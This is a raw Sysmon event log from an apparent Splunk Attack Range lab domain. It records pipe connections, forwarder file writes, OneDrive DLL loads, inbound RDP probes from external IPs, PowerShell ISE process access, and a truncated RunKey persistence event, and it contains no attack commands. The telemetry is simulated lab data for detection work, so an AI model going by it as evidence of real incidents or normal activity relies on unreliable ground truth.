18141800x800000000000000079183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000050506Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:16.571{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6316996A996FACADE65BC34FE8B346A2,SHA256=2D3FBEC770A26604977D0ADD74145CDAC16027F5054044DABE694E6EF7DA5056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:17.763{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C53789488BA8544BD915E46DD03048F,SHA256=E4C4151D3C47CFE77B7893159FDDC7CA30746975D110ED349DEA6680A2F8243A,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000079256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:17.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000079255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.114{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-339.attackrange.local57553-false10.0.1.14win-dc-339.attackrange.local389ldap 11241100x800000000000000079254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:17.263{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncShell64.dll2021-04-20 14:58:17.263 354300x800000000000000079253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.114{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57553-false10.0.1.14win-dc-339.attackrange.local389ldap 354300x800000000000000079252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.080{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57552-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000079251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.080{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57552-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 18141800x800000000000000079250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:17.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000079249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.552{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-14489-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000079248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.157{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59454-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000079247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:17.138{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\RemoteAccess.dll2021-04-20 14:58:17.138 10341000x800000000000000079246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:17.060{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC07-607E-350E-00000000BB01}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000079245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.966{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.966{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000079238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:16.857{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5Network.dll2021-04-20 14:58:16.857 354300x800000000000000050510Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:15.880{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com61953-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050509Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:15.137{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55955-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050508Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:17.603{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=827B407EAFB8FA320F3C76F407818350,SHA256=7EB9A91484382E23859B29AB23B91602FE6E87CFE389C701204EC68331F7D630,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050507Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:17.087{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=065B3D8A27076E3FDF61A43179F7F24F,SHA256=2276C051A007C49DBC1EBB5B01226C7BA3863CBCB5C85A9DE244FBE7BA8D7F3D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000079273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:18.498{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\arm64\FileSyncApi64.dll2021-04-20 14:58:18.498 10341000x800000000000000079272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000079271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.498{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.498{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d0829c.rbsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000079265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.250{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57556-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000079264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.250{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57556-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000079263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.234{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57555-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local49666- 354300x800000000000000079262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.234{A7A01FEF-B626-607E-1400-00000000BB01}1276C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57555-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local49666- 354300x800000000000000079261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.205{A7A01FEF-B626-607E-0D00-00000000BB01}1008C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57554-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local135epmap 354300x800000000000000079260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.205{A7A01FEF-B626-607E-1400-00000000BB01}1276C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57554-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local135epmap 23542300x800000000000000079259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.060{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF61DF6543FCEF8E01.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:18.013{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF2E5CC6E429C49233.TMPMD5=AB035B03D03A400106A9F82DDF126767,SHA256=DEFF6E16FBF4497DCEDB79CAEFA0C70F53C93605505C45747A739420CD93F582,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050513Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:16.701{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57438-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050512Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:16.559{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54476-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050511Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:18.634{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AB1199890C7DE5240A9576A47D90CE7,SHA256=579CB2C1E716ADE46368CAE48B47B4F906D222A19E93C200F84C6C0C32581D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:19.951{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE777F9CDAC64729218EC1206B6A1A68,SHA256=30792D9F769A66968043CA8765370979B6686419D96AE765A58D71E8BD64A650,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000079285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:19.795{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\IRMProtectors\Microsoft.Office.Irm.OfcProtector.dll2021-04-20 14:58:19.795 13241300x800000000000000079284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1060,RunKeySetValue2021-04-20 